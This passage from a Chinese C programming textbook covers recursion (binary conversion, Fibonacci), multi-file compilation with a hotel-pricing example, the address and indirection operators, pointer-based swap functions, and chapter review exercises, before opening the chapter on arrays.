我们要设计一个以二进制形式表示整数的方法或算法(algorithm)。例 如,如何用二进制表示十进制数5?在二进制中,奇数的末尾一定是1,偶数 的末尾一定是0,所以通过5 % 2即可确定5的二进制数的最后一位是1还是 0。一般而言,对于数字n,其二进制的最后一位是n % 2。因此,计算的第 一位数字实际上是待输出二进制数的最后一位。这一规律提示我们,在递归 函数的递归调用之前计算n % 2,在递归调用之后打印计算结果。这样,计 算的第1个值正好是最后一个打印的值。 要获得下一位数字,必须把原数除以 2。这种计算方法相当于在十进制 下把小数点左移一位,如果计算结果是偶数,那么二进制的下一位数就是 0;如果是奇数,就是1。例如,5/2得2(整数除法),2是偶数(2%2 得 0),所以下一位二进制数是 0。到目前为止,我们已经获得 01。继续重复 这个过程。2/2得1,1%2得1,所以下一位二进制数是1。因此,我们得到5 的等价二进制数是101。那么,程序应该何时停止计算?当与2相除的结果小 于2时停止计算,因为只要结果大于或等于2,就说明还有二进制位。每次除 以 2 就相当于去掉一位二进制,直到计算出最后一位为止(如果不好理解, 600 可以拿十进制数来做类比:628%10得8,因此8就是该数最后一位;而 628/10得62,而62%10得2,所以该数的下一位是2,以此类推)。程序清单 9.8演示了上述算法。 程序清单9.8 binary.c程序 /* binary.c -- 以二进制形式打印制整数 */ #include <stdio.h> void to_binary(unsigned long n); int main(void) { unsigned long number; printf("Enter an integer (q to quit):\n"); while (scanf("%lu", &number) == 1) { printf("Binary equivalent: "); to_binary(number); putchar('\n'); printf("Enter an integer (q to quit):\n"); } printf("Done.\n"); return 0; 601 } void to_binary(unsigned long n) /* 递归函数 */ { int r; r = n % 2; if (n >= 2) to_binary(n / 2); putchar(r == 0 ? '0' : '1'); return; } 在该程序中,如果r的值是0,to_binary()函数就显示字符'0';如果r的值 是1,to_binary()函数则显示字符'1'。条件表达式r == 0 ? '0' : '1'用于把数值转 换成字符。 下面是该程序的运行示例: Enter an integer (q to quit): 9 Binary equivalent: 1001 Enter an integer (q to quit): 255 Binary equivalent: 11111111 602 Enter an integer (q to quit): 1024 Binary equivalent: 10000000000 Enter an integer (q to quit): q done. 不用递归,是否能实现这种用二进制形式表示整数的算法?当然可以。 但是由于这种算法要首先计算最后一位二进制数,所以在显示结果之前必须 把所有的位数都储存在别处(例如,数组)。第 15 章中会介绍一个不用递 归实现该算法的例子。 9.3.5 递归的优缺点 递归既有优点也有缺点。优点是递归为某些编程问题提供了最简单的解 决方案。缺点是一些递归算法会快速消耗计算机的内存资源。另外,递归不 方便阅读和维护。我们用一个例子来说明递归的优缺点。 斐波那契数列的定义如下:第1 个和第2 个数字都是1,而后续的每个数 字都是其前两个数字之和。例如,该数列的前几个数是:1、1、2、3、5、 8、13。斐波那契数列在数学界深受喜爱,甚至有专门研究它的刊物。不 过,这不在本书的讨论范围之内。下面,我们要创建一个函数,接受正整数 n,返回相应的斐波那契数值。 首先,来看递归。递归提供一个简单的定义。如果把函数命名为 Fibonacci(),那么如果n是1或2, Fibonacci(n)应返回1;对于其他数值,则应 返回Fibonacci(n-1)+Fibonacci(n-2): unsigned long Fibonacci(unsigned n) 603 { if (n > 2) return Fibonacci(n-1) + Fibonacci(n-2); else return 1; } 这个递归函数只是重述了数学定义的递归。该函数使用了双递归 (double recursion),即函数每一级递归都要调用本身两次。这暴露了一个 问题。 为了说明这个问题,假设调用 Fibonacci(40)。这是第1 级递归调用,将 创建一个变量 n。然后在该函数中要调用Fibonacci()两次,在第2级递归中要 分别创建两个变量n。这两次调用中的每次调用又会进行两次调用,因而在 第3级递归中要创建4个名为n的变量。此时总共创建了7个变量。由于每级递 归创建的变量都是上一级递归的两倍,所以变量的数量呈指数增长!在第 5 章中介绍过一个计算小麦粒数的例子,按指数增长很快就会产生非常大的 值。在本例中,指数增长的变量数量很快就消耗掉计算机的大量内存,很可 能导致程序崩溃。 虽然这是个极端的例子,但是该例说明:在程序中使用递归要特别注 意,尤其是效率优先的程序。 所有的C函数皆平等 程序中的每个C函数与其他函数都是平等的。每个函数都可以调用其他 函数,或被其他函数调用。这点与Pascal和Modula-2中的过程不同,虽然过 程可以嵌套在另一个过程中,但是嵌套在不同过程中的过程之间不能相互调 用。 604 main()函数是否与其他函数不同?是的,main()的确有点特殊。当 main()与程序中的其他函数放在一起时,最开始执行的是main()函数中的第1 条语句,但是这也是局限之处。main()也可以被自己或其他函数递归调用 ——尽管很少这样做。 605 9.4 编译多源代码文件的程序 使用多个函数最简单的方法是把它们都放在同一个文件中,然后像编译 只有一个函数的文件那样编译该文件即可。其他方法因操作系统而异,下面 将举例说明。 9.4.1 UNIX 假定在UNIX系统中安装了UNIX C编译器cc(最初的cc已经停用,但是 许多UNIX系统都给cc命令起了一个别名用作其他编译器命令,典型的是gcc 或clang)。假设file1.c和file2.c是两个内含C函数的文件,下面的命令将编译 两个文件并生成一个名为a.out的可执行文件: cc file1.c file2.c 另外,还生成两个名为file1.o和file2.o的目标文件。如果后来改动了 file1.c,而file2.c不变,可以使用以下命令编译第1个文件,并与第2个文件 的目标代码合并: cc file1.c file2.o UNIX系统的make命令可自动管理多文件程序,但是这超出了本书的讨 论范围。 注意,OS X的Terminal工具可以打开UNIX命令行环境,但是必须先下 载命令行编译器(GCC和Clang)。 9.4.2 Linux 假定Linux系统安装了GNU C编译器GCC。假设file1.c和file2.c是两个内 含C函数的文件,下面的命令将编译两个文件并生成名为a.out的可执行文 件: gcc file1.c file2.c 606 另外,还生成两个名为file1.o和file2.o的目标文件。如果后来改动了 file1.c,而file2.c不变,可以使用以下命令编译第1个文件,并与第2个文件 的目标代码合并: gcc file1.c file2.o 9.4.3 DOS命令行编译器 绝大多数DOS命令行编译器的工作原理和UNIX的cc命令类似,只不过 使用不同的名称而已。其中一个区别是,对象文件的扩展名是.obj,而不 是.o。一些编译器生成的不是目标代码文件,而是汇编语言或其他特殊代码 的中间文件。 9.4.4 Windows和苹果的IDE编译器 Windows和Macintosh系统使用的集成开发环境中的编译器是面向项目 的。项目(project)描述的是特定程序使用的资源。资源包括源代码文件。 这种IDE中的编译器要创建项目来运行单文件程序。对于多文件程序,要使 用相应的菜单命令,把源代码文件加入一个项目中。要确保所有的源代码文 件都在项目列表中列出。许多IDE都不用在项目列表中列出头文件(即扩展 名为.h的文件),因为项目只管理使用的源代码文件,源代码文件中的 #include指令管理该文件中使用的头文件。但是,Xcode要在项目中添加头文 件。 9.4.5 使用头文件 如果把main()放在第1个文件中,把函数定义放在第2个文件中,那么第 1个文件仍然要使用函数原型。把函数原型放在头文件中,就不用在每次使 用函数文件时都写出函数的原型。C 标准库就是这样做的,例如,把I/O函 数原型放在stdio.h中,把数学函数原型放在math.h中。你也可以这样用自定 义的函数文件。 另外,程序中经常用C预处理器定义符号常量。这种定义只储存了那些 607 包含#define指令的文件。如果把程序的一个函数放进一个独立的文件中,你 也可以使用#define指令访问每个文件。最直接的方法是在每个文件中再次输 入指令,但是这个方法既耗时又容易出错。另外,还会有维护的问题:如果 修改了#define 定义的值,就必须在每个文件中修改。更好的做法是,把 #define 指令放进头文件,然后在每个源文件中使用#include指令包含该文件 即可。 总之,把函数原型和已定义的字符常量放在头文件中是一个良好的编程 习惯。我们考虑一个例子:假设要管理 4 家酒店的客房服务,每家酒店的房 价不同,但是每家酒店所有房间的房价相同。对于预订住宿多天的客户,第 2天的房费是第1天的95%,第3天是第2天的95%,以此类推(暂不考虑这种 策略的经济效益)。设计一个程序让用户指定酒店和入住天数,然后计算并 显示总费用。同时,程序要实现一份菜单,允许用户反复输入数据,除非用 户选择退出。 程序清单9.9、程序清单9.10和程序清单9.11演示了如何编写这样的程 序。第1个程序清单包含main()函数,提供整个程序的组织结构。第 2 个程 序清单包含支持的函数,我们假设这些函数在独立的文件中。最后,程序清 单9.11列出了一个头文件,包含了该程序所有源文件中使用的自定义符号常 量和函数原型。前面介绍过,在UNIX和DOS环境中,#include "hotels.h"指令 中的双引号表明被包含的文件位于当前目录中(通常是包含源代码的目 录)。如果使用IDE,需要知道如何把头文件合并成一个项目。 程序清单9.9 usehotel.c控制模块 /* usehotel.c -- 房间费率程序 */ /* 与程序清单9.10一起编译   */ #include <stdio.h> #include "hotel.h" /* 定义符号常量,声明函数 */ 608 int main(void) { int nights; double hotel_rate; int code; while ((code = menu()) != QUIT) { switch (code) { case 1:  hotel_rate = HOTEL1; break; case 2:  hotel_rate = HOTEL2; break; case 3:  hotel_rate = HOTEL3; break; case 4:  hotel_rate = HOTEL4; break; default: hotel_rate = 0.0; printf("Oops!\n"); 609 break; } nights = getnights(); showprice(hotel_rate, nights); } printf("Thank you and goodbye.\n"); return 0; } 程序清单9.10 hotel.c函数支持模块 /* hotel.c -- 酒店管理函数 */ #include <stdio.h> #include "hotel.h" int menu(void) { int code, status; printf("\n%s%s\n", STARS, STARS); printf("Enter the number of the desired hotel:\n"); printf("1) Fairfield Arms        2) Hotel Olympic\n"); printf("3) Chertworthy Plaza     4) The Stockton\n"); 610 printf("5) quit\n"); printf("%s%s\n", STARS, STARS); while ((status = scanf("%d", &code)) != 1 || (code < 1 || code > 5)) { if (status != 1) scanf("%*s"); // 处理非整数输入 printf("Enter an integer from 1 to 5, please.\n"); } return code; } int getnights(void) { int nights; printf("How many nights are needed? "); while (scanf("%d", &nights) != 1) { scanf("%*s");   // 处理非整数输入 printf("Please enter an integer, such as 2.\n"); 611 } return nights; } void showprice(double rate, int nights) { int n; double total = 0.0; double factor = 1.0; for (n = 1; n <= nights; n++, factor *= DISCOUNT) total += rate * factor; printf("The total cost will be $%0.2f.\n", total); } 程序清单9.11 hotel.h头文件 /* hotel.h -- 符号常量和 hotel.c 中所有函数的原型 */ #define QUIT     5 #define HOTEL1  180.00 #define HOTEL2  225.00 #define HOTEL3  255.00 #define HOTEL4  355.00 612 #define DISCOUNT  0.95 #define STARS "**********************************" // 显示选择列表 int menu(void); // 返回预订天数 int getnights(void); // 根据费率、入住天数计算费用 // 并显示结果 void showprice(double rate, int nights); 下面是这个多文件程序的运行示例: ******************************************************************** Enter the number of the desired hotel: 1) Fairfield Arms        2) Hotel Olympic 3) Chertworthy Plaza      4) The Stockton 5) quit ******************************************************************** 3 How many nights are needed? 1 The total cost will be $255.00. 613 ******************************************************************** Enter the number of the desired hotel: 1) Fairfield Arms        2) Hotel Olympic 3) Chertworthy Plaza      4) The Stockton 5) quit ******************************************************************** 4 How many nights are needed? 3 The total cost will be $1012.64. ******************************************************************** Enter the number of the desired hotel: 1) Fairfield Arms        2) Hotel Olympic 3) Chertworthy Plaza      4) The Stockton 5) quit ******************************************************************** 5 Thank you and goodbye. 顺带一提,该程序中有几处编写得很巧妙。尤其是,menu()和getnights() 函数通过测试scanf()的返回值来跳过非数值数据,而且调用 scanf("%*s")跳 至下一个空白字符。注意,menu()函数中是如何检查非数值输入和超出范围 614 的数据: while ((status = scanf("%d", &code)) != 1 ||(code < 1 || code > 5)) 以上代码段利用了C语言的两个规则:从左往右对逻辑表达式求值;一 旦求值结果为假,立即停止求值。在该例中,只有在scanf()成功读入一个整 数值后,才会检查code的值。 用不同的函数处理不同的任务时应检查数据的有效性。当然,首次编写 menu()或getnights()函数时可以暂不添加这一功能,只写一个简单的scanf()即 可。待基本版本运行正常后,再逐步改善各模块。 615 9.5 查找地址:&运算符 指针(pointer)是 C 语言最重要的(有时也是最复杂的)概念之一,用 于储存变量的地址。前面使用的scanf()函数中就使用地址作为参数。概括地 说,如果主调函数不使用return返回的值,则必须通过地址才能修改主调函 数中的值。接下来,我们将介绍带地址参数的函数。首先介绍一元&运算符 的用法。 一元&运算符给出变量的存储地址。如果pooh是变量名,那么&pooh是 变量的地址。可以把地址看作是变量在内存中的位置。假设有下面的语句: pooh = 24; 假设pooh的存储地址是0B76(PC地址通常用十六进制形式表示)。那 么,下面的语句: printf("%d %p\n", pooh, &pooh); 将输出如下内容(%p是输出地址的转换说明): 24 0B76 程序清单9.12中使用了这个运算符查看不同函数中的同名变量分别储存 在什么位置。 程序清单9.12 loccheck.c程序 /* loccheck.c -- 查看变量被储存在何处 */ #include <stdio.h> void mikado(int);       /* 函数原型 */ int main(void) 616 { int pooh = 2, bah = 5; /* main()的局部变量 */ printf("In main(), pooh = %d and &pooh = %p\n", pooh,  &pooh); printf("In main(), bah = %d and &bah = %p\n", bah, &bah); mikado(pooh); return 0; } void mikado(int bah)      /* 定义函数 */ { int pooh = 10;       /* mikado()的局部变量 */ printf("In mikado(), pooh = %d and &pooh = %p\n", pooh,  &pooh); printf("In mikado(), bah = %d and &bah = %p\n",  bah,  &bah); } 程序清单9.12中使用ANSI C的%p格式打印地址。我们的系统输出如 下: In main(), pooh = 2 and &pooh = 0x7fff5fbff8e8 In main(), bah = 5 and &bah = 0x7fff5fbff8e4 617 In mikado(), pooh = 10 and &pooh = 0x7fff5fbff8b8 In mikado(), bah = 2 and &bah = 0x7fff5fbff8bc 实现不同,%p表示地址的方式也不同。然而,许多实现都如本例所 示,以十六进制显示地址。顺带一提,每个十六进制数对应4位,该例显示 12个十六进制数,对应48位地址。 该例的输出说明了什么?首先,两个pooh的地址不同,两个bah的地址 也不同。因此,和前面介绍的一样,计算机把它们看成4个独立的变量。其 次,函数调用mikado(pooh)把实际参数(main()中的pooh)的值(2)传递给 形式参数(mikado()中的bah)。注意,这种传递只传递了值。涉及的两个变 量(main()中的pooh和mikado()中的bah)并未改变。 我们强调第2 点,是因为这并不是在所有语言中都成立。例如,在 FORTRAN中,子例程会影响主调例程的原始变量。子例程的变量名可能与 原始变量不同,但是它们的地址相同。但是,在 C语言中不是这样。每个C 函数都有自己的变量。这样做更可取,因为这样做可以防止原始变量被被调 函数中的副作用意外修改。然而,正如下节所述,这也带来了一些麻烦。 618 9.6 更改主调函数中的变量 有时需要在一个函数中更改其他函数的变量。例如,普通的排序任务中 交换两个变量的值。假设要交换两个变量x和y的值。简单的思路是: x = y; y = x; 这完全不起作用,因为执行到第2行时,x的原始值已经被y的原始值替 换了。因此,要多写一行代码,储存x的原始值: temp = x; x = y; y = temp; 上面这 3 行代码便可实现交换值的功能,可以编写成一个函数并构造一 个驱动程序来测试。在程序清单9.13中,为清楚地表明变量属于哪个函数, 在main()中使用变量x和y,在intercharge()中使用u和v。 程序清单9.13 swap1.c程序 /* swap1.c -- 第1个版本的交换函数 */ #include <stdio.h> void interchange(int u, int v); /* 声明函数 */ int main(void) { int x = 5, y = 10; 619 printf("Originally x = %d and y = %d.\n", x, y); interchange(x, y); printf("Now x = %d and y = %d.\n", x, y); return 0; } void interchange(int u, int v) /* 定义函数 */ { int temp; temp = u; u = v; v = temp; } 运行该程序后,输出如下: Originally x = 5 and y = 10. Now x = 5 and y = 10. 两个变量的值并未交换!我们在interchange()中添加一些打印语句来检 查错误(见程序清单9.14)。 程序清单9.14 swap2.c程序 /* swap2.c -- 查找swap1.c的问题 */ 620 #include <stdio.h> void interchange(int u, int v); int main(void) { int x = 5, y = 10; printf("Originally x = %d and y = %d.\n", x, y); interchange(x, y); printf("Now x = %d and y = %d.\n", x, y); return 0; } void interchange(int u, int v) { int temp; printf("Originally u = %d and v = %d.\n", u, v); temp = u; u = v; v = temp; printf("Now u = %d and v = %d.\n", u, v); } 621 下面是该程序的输出: Originally x = 5 and y = 10. Originally u = 5 and v = 10. Now u = 10 and v = 5. Now x = 5 and y = 10. 看来,interchange()没有问题,它交换了 u 和 v 的值。问题出在把结果 传回 main()时。interchange()使用的变量并不是main()中的变量。因此,交换 u和v的值对x和y的值没有影响!是否能用return语句把值传回main()?当然可 以,在interchange()的末尾加上下面一行语句: return(u); 然后修改main()中的调用: x = interchange(x,y); 这只能改变x的值,而y的值依旧没变。用return语句只能把被调函数中 的一个值传回主调函数,但是现在要传回两个值。这没问题!不过,要使用 指针。 622 9.7 指针简介 指针?什么是指针?从根本上看,指针(pointer)是一个值为内存地址 的变量(或数据对象)。正如char类型变量的值是字符,int类型变量的值是 整数,指针变量的值是地址。在C语言中,指针有许多用法。本章将介绍如 何把指针作为函数参数使用,以及为何要这样用。 假设一个指针变量名是ptr,可以编写如下语句: ptr = &pooh; // 把pooh的地址赋给ptr 对于这条语句,我们说ptr“指向”pooh。ptr和&pooh的区别是ptr是变量, 而&pooh是常量。或者,ptr是可修改的左值,而&pooh是右值。还可以把ptr 指向别处: ptr = &bah; // 把ptr指向bah,而不是pooh 现在ptr的值是bah的地址。 要创建指针变量,先要声明指针变量的类型。假设想把ptr声明为储存 int类型变量地址的指针,就要使用下面介绍的新运算符。 9.7.1 间接运算符:* 假设已知ptr指向bah,如下所示: ptr = &bah; 然后使用间接运算符*(indirection operator)找出储存在bah中的值,该 运算符有时也称为解引用运算符(dereferencing operator)。不要把间接运算 符和二元乘法运算符(*)混淆,虽然它们使用的符号相同,但语法功能不 同。 val = *ptr; // 找出ptr指向的值 623 语句ptr = &bah;和val = *ptr;放在一起相当于下面的语句: val = bah; 由此可见,使用地址和间接运算符可以间接完成上面这条语句的功能, 这也是“间接运算符”名称的由来。 小结:与指针相关的运算符 地址运算符:& 一般注解: 后跟一个变量名时,&给出该变量的地址。 示例: &nurse表示变量nurse的地址。 地址运算符:* 一般注解: 后跟一个指针名或地址时,*给出储存在指针指向地址上的值。 示例: nurse = 22; ptr = &nurse; // 指向nurse的指针 val = *ptr;  // 把ptr指向的地址上的值赋给val 执行以上3条语句的最终结果是把22赋给val。 9.7.2 声明指针 624 相信读者已经很熟悉如何声明int类型和其他基本类型的变量,那么如何 声明指针变量?你也许认为是这样声明: pointer ptr; // 不能这样声明指针 为什么不能这样声明?因为声明指针变量时必须指定指针所指向变量的 类型,因为不同的变量类型占用不同的存储空间,一些指针操作要求知道操 作对象的大小。另外,程序必须知道储存在指定地址上的数据类型。long和 float可能占用相同的存储空间,但是它们储存数字却大相径庭。下面是一些 指针的声明示例: int * pi;   // pi是指向int类型变量的指针 char * pc;    // pc是指向char类型变量的指针 float * pf, * pg; // pf、pg都是指向float类型变量的指针 类型说明符表明了指针所指向对象的类型,星号(*)表明声明的变量 是一个指针。int * pi;声明的意思是pi是一个指针,*pi是int类型(见图 9.5)。 625 图9.5 声明并使用指针 *和指针名之间的空格可有可无。通常,程序员在声明时使用空格,在 解引用变量时省略空格。 pc指向的值(*pc)是char类型。pc本身是什么类型?我们描述它的类型 是“指向char类型的指针”。pc 的值是一个地址,在大部分系统内部,该地址 由一个无符号整数表示。但是,不要把指针认为是整数类型。一些处理整数 的操作不能用来处理指针,反之亦然。例如,可以把两个整数相乘,但是不 能把两个指针相乘。所以,指针实际上是一个新类型,不是整数类型。因 此,如前所述,ANSI C专门为指针提供了%p格式的转换说明。 9.7.3 使用指针在函数间通信 我们才刚刚接触指针,指针的世界丰富多彩。本节着重介绍如何使用指 针解决函数间的通信问题。请看程序清单9.15,该程序在interchange()函数中 使用了指针参数。稍后我们将对该程序做详细分析。 程序清单9.15 swap3.c程序 /* swap3.c -- 使用指针解决交换函数的问题 */ #include <stdio.h> void interchange(int * u, int * v); int main(void) { int x = 5, y = 10; printf("Originally x = %d and y = %d.\n", x, y); interchange(&x, &y);  // 把地址发送给函数 626 printf("Now x = %d and y = %d.\n", x, y); return 0; } void interchange(int * u, int * v) { int temp; temp = *u;  // temp获得 u 所指向对象的值 *u = *v; *v = temp; } 该程序是否能正常运行?下面是程序的输出: Originally x = 5 and y = 10. Now x = 10 and y = 5. 没问题,一切正常。接下来,我们分析程序清单9.15的运行情况。首先 看函数调用: interchange(&x, &y); 该函数传递的不是x和y的值,而是它们的地址。这意味着出现在 interchange()原型和定义中的形式参数u和v将把地址作为它们的值。因此, 应把它们声明为指针。由于x和y是整数,所以u和v是指向整数的指针,其声 明如下: 627 void interchange (int * u, int * v) 接下来,在函数体中声明了一个交换值时必需的临时变量: int temp; 通过下面的语句把x的值储存在temp中: temp = *u; 记住,u的值是&x,所以u指向x。这意味着用*u即可表示x的值,这正是 我们需要的。不要写成这样: temp = u; /* 不要这样做 */ 因为这条语句赋给temp的是x的地址(u的值就是x的地址),而不是x的 值。函数要交换的是x和y的值,而不是它们的地址。 与此类似,把y的值赋给x,要使用下面的语句: *u = *v; 这条语句相当于: x = y; 我们总结一下该程序示例做了什么。我们需要一个函数交换x和y的值。 把x和y的地址传递给函数,我们让interchange()访问这两个函数。使用指针 和*运算符,该函数可以访问储存在这些位置的值并改变它们。 可以省略ANSI C风格的函数原型中的形参名,如下所示: void interchange(int *, int *); 一般而言,可以把变量相关的两类信息传递给函数。如果这种形式的函 数调用,那么传递的是x的值: 628 function1(x); 如果下面形式的函数调用,那么传递的是x的地址: function2(&x); 第1种形式要求函数定义中的形式参数必须是一个与x的类型相同的变 量: int function1(int num) 第2种形式要求函数定义中的形式参数必须是一个指向正确类型的指 针: int function2(int * ptr) 如果要计算或处理值,那么使用第 1 种形式的函数调用;如果要在被调 函数中改变主调函数的变量,则使用第2种形式的函数调用。我们用过的 scanf()函数就是这样。当程序要把一个值读入变量时(如本例中的num), 调用的是scanf("%d", &num)。scanf()读取一个值,然后把该值储存到指定的 地址上。 对本例而言,指针让interchange()函数通过自己的局部变量改变main()中 变量的值。 熟悉Pascal和Modula-2的读者应该看出第1种形式和Pascal的值参数相 同,第2种形式和Pascal的变量参数类似。C++程序员可能认为,既然C和 C++都使用指针变量,那么C应该也有引用变量。让他们失望了,C没有引 用变量。对BASIC程序员而言,可能很难理解整个程序。如果觉得本节的内 容晦涩难懂,请多做一些相关的编程练习,你会发现指针非常简单实用(见 图9.6)。 629 图9.6 按字节寻址系统(如PC)中变量的名称、地址和值 变量:名称、地址和值 通过前面的讨论发现,变量的名称、地址和变量的值之间关系密切。我 们来进一步分析。 编写程序时,可以认为变量有两个属性:名称和值(还有其他性质,如 类型,暂不讨论)。计算机编译和加载程序后,认为变量也有两个属性:地 址和值。地址就是变量在计算机内部的名称。 在许多语言中,地址都归计算机管,对程序员隐藏。然而在 C 中,可 以通过&运算符访问地址,通过*运算符获得地址上的值。例如,&barn表示 变量barn的地址,使用函数名即可获得变量的数值。例如,printf("%d\n", barn)打印barn的值,使用*运算符即可获得储存在地址上的值。如果pbarn= &barn;,那么*pbarn表示的是储存在&barn地址上的值。 简而言之,普通变量把值作为基本量,把地址作为通过&运算符获得的 派生量,而指针变量把地址作为基本量,把值作为通过*运算符获得的派生 量。 虽然打印地址可以满足读者好奇心,但是这并不是&运算符的主要用 途。更重要的是使用&、*和指针可以操纵地址和地址上的内容,如swap3.c 630 程序(程序清单9.15)所示。 小结:函数 形式: 典型的ANSI C函数的定义形式为: 返回类型 名称(形参声明列表) 函数体 形参声明列表是用逗号分隔的一系列变量声明。除形参变量外,函数的 其他变量均在函数体的花括号之内声明。 示例: int diff(int x, int y) // ANSI C { // 函数体开始 int z;     // 声明局部变量 z = x - y; return z; // 返回一个值 } // 函数体结束 传递值: 实参用于把值从主调函数传递给被调函数。如果变量a和b的值分别是5 和2,那么调用: c = diff(a,b); 把5和2分别传递给变量x和y。5和2称为实际参数(简称实参),diff()函 631 数定义中的变量x和y称为形式参数(简称形参)。使用关键字return把被调 函数中的一个值传回主调函数。本例中, c接受z的值3。被调函数一般不会 改变主调函数中的变量,如果要改变,应使用指针作为参数。如果希望把更 多的值传回主调函数,必须这么做。 函数的返回类型: 函数的返回类型指的是函数返回值的类型。如果返回值的类型与声明的 返回类型不匹配,返回值将被转换成函数声明的返回类型。 函数签名: 函数的返回类型和形参列表构成了函数签名。因此,函数签名指定了传 入函数的值的类型和函数返回值的类型。 示例: double duff(double, int); // 函数原型 int main(void) { double q, x; int n; ... q = duff(x,n);     //函数调用 ... } double duff(double u, int k)  //函数定义 632 { double tor; ... return tor;  //返回double类型的值 } 633 9.8 关键概念 如果想用C编出高效灵活的程序,必须理解函数。把大型程序组织成若 干函数非常有用,甚至很关键。如果让一个函数处理一个任务,程序会更好 理解,更方便调试。要理解函数是如何把信息从一个函数传递到另一函数, 也就是说,要理解函数参数和返回值的工作原理。另外,要明白函数形参和 其他局部变量都属于函数私有,因此,声明在不同函数中的同名变量是完全 不同的变量。而且,函数无法直接访问其他函数中的变量。这种限制访问保 护了数据的完整性。但是,当确实需要在函数中访问另一个函数的数据时, 可以把指针作为函数的参数。 634 9.9 本章小结 函数可以作为组成大型程序的构件块。每个函数都应该有一个单独且定 义好的功能。使用参数把值传给函数,使用关键字return把值返回函数。如 果函数返回的值不是int类型,则必须在函数定义和函数原型中指定函数的类 型。如果需要在被调函数中修改主调函数的变量,使用地址或指针作为参 数。 ANSI C提供了一个强大的工具——函数原型,允许编译器验证函数调 用中使用的参数个数和类型是否正确。 C 函数可以调用本身,这种调用方式被称为递归。一些编程问题要用递 归来解决,但是递归不仅消耗内存多,效率不高,而且费时。 635 9.10 复习题 复习题的参考答案在附录A中。 1.实际参数和形式参数的区别是什么? 2.根据下面各函数的描述,分别编写它们的ANSI C函数头。注意,只需 写出函数头,不用写函数体。 a.donut()接受一个int类型的参数,打印若干(参数指定数目)个0 b.gear()接受两个int类型的参数,返回int类型的值 c.guess()不接受参数,返回一个int类型的值 d.stuff_it()接受一个double类型的值和double类型变量的地址,把第1个 值储存在指定位置 3.根据下面各函数的描述,分别编写它们的ANSI C函数头。注意,只需 写出函数头,不用写函数体。 a.n_to_char()接受一个int类型的参数,返回一个char类型的值 b.digit()接受一个double类型的参数和一个int类型的参数,返回一个int类 型的值 c.which()接受两个可储存double类型变量的地址,返回一个double类型 的地址 d.random()不接受参数,返回一个int类型的值 4.设计一个函数,返回两整数之和。 5.如果把复习题4改成返回两个double类型的值之和,应如何修改函数? 6.设计一个名为alter()的函数,接受两个int类型的变量x和y,把它们的 636 值分别改成两个变量之和以及两变量之差。 7.下面的函数定义是否正确? void salami(num) { int num, count; for (count = 1; count <= num; num++) printf(" O salami mio!\n"); } 8.编写一个函数,返回3个整数参数中的最大值。 9.给定下面的输出: Please choose one of the following: 1) copy files         2) move files 3) remove files       4) quit Enter the number of your choice: a.编写一个函数,显示一份有4个选项的菜单,提示用户进行选择(输 出如上所示)。 b.编写一个函数,接受两个int类型的参数分别表示上限和下限。该函数 从用户的输入中读取整数。如果整数超出规定上下限,函数再次打印菜单 (使用a部分的函数)提示用户输入,然后获取一个新值。如果用户输入的 整数在规定范围内,该函数则把该整数返回主调函数。如果用户输入一个非 整数字符,该函数应返回4。 637 c.使用本题a和b部分的函数编写一个最小型的程序。最小型的意思是, 该程序不需要实现菜单中各选项的功能,只需显示这些选项并获取有效的响 应即可。 638 9.11 编程练习 1.设计一个函数min(x, y),返回两个double类型值的较小值。在一个简单 的驱动程序中测试该函数。 2.设计一个函数chline(ch, i, j),打印指定的字符j行i列。在一个简单的驱 动程序中测试该函数。 3.编写一个函数,接受3个参数:一个字符和两个整数。字符参数是待 打印的字符,第1个整数指定一行中打印字符的次数,第2个整数指定打印指 定字符的行数。编写一个调用该函数的程序。 4.两数的调和平均数这样计算:先得到两数的倒数,然后计算两个倒数 的平均值,最后取计算结果的倒数。编写一个函数,接受两个double类型的 参数,返回这两个参数的调和平均数。 5.编写并测试一个函数larger_of(),该函数把两个double类型变量的值替 换为较大的值。例如, larger_of(x, y)会把x和y中较大的值重新赋给两个变 量。 6.编写并测试一个函数,该函数以3个double变量的地址作为参数,把最 小值放入第1个函数,中间值放入第2个变量,最大值放入第3个变量。 7.编写一个函数,从标准输入中读取字符,直到遇到文件结尾。程序要 报告每个字符是否是字母。如果是,还要报告该字母在字母表中的数值位 置。例如,c和C在字母表中的位置都是3。合并一个函数,以一个字符作为 参数,如果该字符是一个字母则返回一个数值位置,否则返回-1。 8.第6章的程序清单6.20中,power()函数返回一个double类型数的正整数 次幂。改进该函数,使其能正确计算负幂。另外,函数要处理0的任何次幂 都为0,任何数的0次幂都为1(函数应报告0的0次幂未定义,因此把该值处 理为1)。要使用一个循环,并在程序中测试该函数。 639 9.使用递归函数重写编程练习8。 10.为了让程序清单9.8中的to_binary()函数更通用,编写一个to_base_n() 函数接受两个在2~10范围内的参数,然后以第2个参数中指定的进制打印第 1个参数的数值。例如,to_base_n(129, 8)显示的结果为201,也就是129的 八进制数。在一个完整的程序中测试该函数。 11.编写并测试Fibonacci()函数,该函数用循环代替递归计算斐波那契 数。 640 第10章 数组和指针 本章介绍以下内容: 关键字:static 运算符:&、*(一元) 如何创建并初始化数组 指针(在已学过的基础上)、指针和数组的关系 编写处理数组的函数 二维数组 人们通常借助计算机完成统计每月的支出、日降雨量、季度销售额等任 务。企业借助计算机管理薪资、库存和客户交易记录等。作为程序员,不可 避免地要处理大量相关数据。通常,数组能高效便捷地处理这种数据。第 6 章简单地介绍了数组,本章将进一步地学习如何使用数组,着重分析如何编 写处理数组的函数。这种函数把模块化编程的优势应用到数组。通过本章的 学习,你将明白数组和指针关系密切。 641 10.1 数组 前面介绍过,数组由数据类型相同的一系列元素组成。需要使用数组 时,通过声明数组告诉编译器数组中内含多少元素和这些元素的类型。编译 器根据这些信息正确地创建数组。普通变量可以使用的类型,数组元素都可 以用。考虑下面的数组声明: /* 一些数组声明*/ int main(void) { float candy[365];    /* 内含365个float类型元素的数组 */ char code[12];     /*内含12个char类型元素的数组*/ int states[50];     /*内含50个int类型元素的数组 */ ... } 方括号([])表明candy、code和states都是数组,方括号中的数字表明 数组中的元素个数。 要访问数组中的元素,通过使用数组下标数(也称为索引)表示数组中 的各元素。数组元素的编号从0开始,所以candy[0]表示candy数组的第1个元 素,candy[364]表示第365个元素,也就是最后一个元素。读者对这些内容应 该比较熟悉,下面我们介绍一些新内容。 10.1.1 初始化数组 数组通常被用来储存程序需要的数据。例如,一个内含12个整数元素的 数组可以储存12个月的天数。在这种情况下,在程序一开始就初始化数组比 642 较好。下面介绍初始化数组的方法。 只储存单个值的变量有时也称为标量变量(scalar variable),我们已经 很熟悉如何初始化这种变量: int fix = 1; float flax = PI * 2; 